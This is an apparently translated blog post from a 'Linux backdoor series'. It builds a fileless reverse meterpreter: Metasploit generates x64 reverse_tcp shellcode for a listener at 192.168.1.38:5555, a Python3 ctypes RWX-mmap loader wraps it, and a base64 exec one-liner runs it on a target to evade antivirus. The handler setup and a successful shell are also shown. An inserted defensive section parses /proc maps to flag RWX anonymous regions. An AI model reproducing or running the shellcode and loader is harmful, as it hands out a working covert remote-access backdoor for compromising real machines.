Fileless reverse meterpreter | Linux backdoor series
I had been watching people do "split" AV evasion (keeping the loader and the payload apart), but almost all of it targets Windows. Since this series is about Linux, let's build a Linux version: a one-liner that spawns a reverse meterpreter, borrowing the split-evasion idea of having Python3 execute the shellcode.
payload: linux/x64/meterpreter/reverse_tcp
Generate the shellcode
use payload/linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.38
set lport 5555
generate
The generated shellcode:
buf =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31" +
"\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51" +
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" +
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00" +
"\x15\xb3\xc0\xa8\x01\x26\x51\x48\x89\xe6\x6a\x10\x5a\x6a" +
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74" +
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31" +
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58" +
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0" +
"\x78\xed\xff\xe6"
Next comes the Python3 shellcode loader:
import ctypes, mmap

def create_shellcode_function(shellcode_bytes):
    # Allocate memory with a RWX private anonymous mmap
    exec_mem = mmap.mmap(-1, len(shellcode_bytes),
                         prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
                         flags=mmap.MAP_ANONYMOUS | mmap.MAP_PRIVATE)
    # Copy shellcode from bytes object to executable memory
    exec_mem.write(shellcode_bytes)
    # Cast the memory to a C function object
    ctypes_buffer = ctypes.c_int.from_buffer(exec_mem)
    function = ctypes.CFUNCTYPE(ctypes.c_int64)(ctypes.addressof(ctypes_buffer))
    function._avoid_gc_for_mmap = exec_mem
    # Return pointer to shell code function in executable memory
    return function

# Placeholder: replace with the generated shellcode as a bytes object (b"...")
buf = "shellcode"
# linux machine code
shellcode = buf
# Create a pointer to our shell code and execute it with no parameters
create_shellcode_function(shellcode)()
Drop our shellcode into the loader and assemble it:
import ctypes, mmap

def create_shellcode_function(shellcode_bytes):
    # Allocate memory with a RWX private anonymous mmap
    exec_mem = mmap.mmap(-1, len(shellcode_bytes),
                         prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
                         flags=mmap.MAP_ANONYMOUS | mmap.MAP_PRIVATE)
    # Copy shellcode from bytes object to executable memory
    exec_mem.write(shellcode_bytes)
    # Cast the memory to a C function object
    ctypes_buffer = ctypes.c_int.from_buffer(exec_mem)
    function = ctypes.CFUNCTYPE(ctypes.c_int64)(ctypes.addressof(ctypes_buffer))
    function._avoid_gc_for_mmap = exec_mem
    # Return pointer to shell code function in executable memory
    return function

buf = b"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x15\xb3\xc0\xa8\x01\x26\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6"
# linux machine code
shellcode = buf
# Create a pointer to our shell code and execute it with no parameters
create_shellcode_function(shellcode)()
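From the defender's side, this loader leaves a distinctive footprint: a private anonymous mapping with rwx permissions inside the Python interpreter's address space, which normal interpreter memory (heap, stack, shared libraries) never has. The following added example, not part of the original post, parses /proc/<pid>/maps text and flags such regions; the maps lines are constructed to mimic a python3 process after the mmap call above.

```python
import re
from dataclasses import dataclass

# /proc/<pid>/maps line: address range, perms, offset, dev, inode, optional pathname
MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

@dataclass
class Region:
    start: int
    end: int
    perms: str
    inode: int
    path: str

    @property
    def size(self) -> int:
        return self.end - self.start

    def is_anonymous(self) -> bool:
        # Anonymous mmap regions have inode 0 and no pathname; [heap]/[stack] etc. are excluded.
        return self.inode == 0 and not self.path.startswith("[")

def parse_maps(text: str) -> list:
    """Parse maps-format text into Region objects, skipping lines that do not match."""
    regions = []
    for line in text.splitlines():
        m = MAPS_RE.match(line.strip())
        if not m:
            continue
        regions.append(Region(int(m["start"], 16), int(m["end"], 16),
                              m["perms"], int(m["inode"]), m["path"].strip()))
    return regions

def find_rwx_anonymous(text: str) -> list:
    """Return private anonymous mappings that are readable, writable and executable at once."""
    return [r for r in parse_maps(text)
            if r.perms[:3] == "rwx" and r.perms[3] == "p" and r.is_anonymous()]

# Constructed sample (not captured from a real host): a python3 process after the RWX mmap.
SAMPLE_MAPS = """\
55d1c2a00000-55d1c2a01000 r--p 00000000 fd:01 1310773                    /usr/bin/python3.10
55d1c2a01000-55d1c2a02000 r-xp 00001000 fd:01 1310773                    /usr/bin/python3.10
55d1c4b00000-55d1c4b21000 rw-p 00000000 00:00 0                          [heap]
7f3a9c000000-7f3a9c001000 rwxp 00000000 00:00 0
7f3a9c200000-7f3a9c3c0000 r--p 00000000 fd:01 1311200                    /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd5e7c0000-7ffd5e7e1000 rw-p 00000000 00:00 0                          [stack]
"""

if __name__ == "__main__":
    for r in find_rwx_anonymous(SAMPLE_MAPS):
        print(f"RWX anonymous mapping {r.start:#x}-{r.end:#x} ({r.size} bytes)")
```

On a live system, feed `open(f"/proc/{pid}/maps").read()` for each interpreter process into `find_rwx_anonymous`; a 196-byte shellcode still shows up as one full 4096-byte page because mmap rounds up to page size.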
With that, the payload we want to run is assembled. How do we execute it as a single command without writing anything to disk? Anyone who read the earlier articles knows the answer: python3 -c 'codes'
Modify the payload from the earlier article:
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('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')))
Listen + execute
Listen on the attacker machine
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.38
set lport 5555
run
Run it on the target host
Successfully obtained a meterpreter shell!
This concludes the reverse shell chapter.
Previous articles
python3 reverse shell & hidden backdoor | Linux backdoor series
dash & rbash & nc.openbsd | Linux backdoor series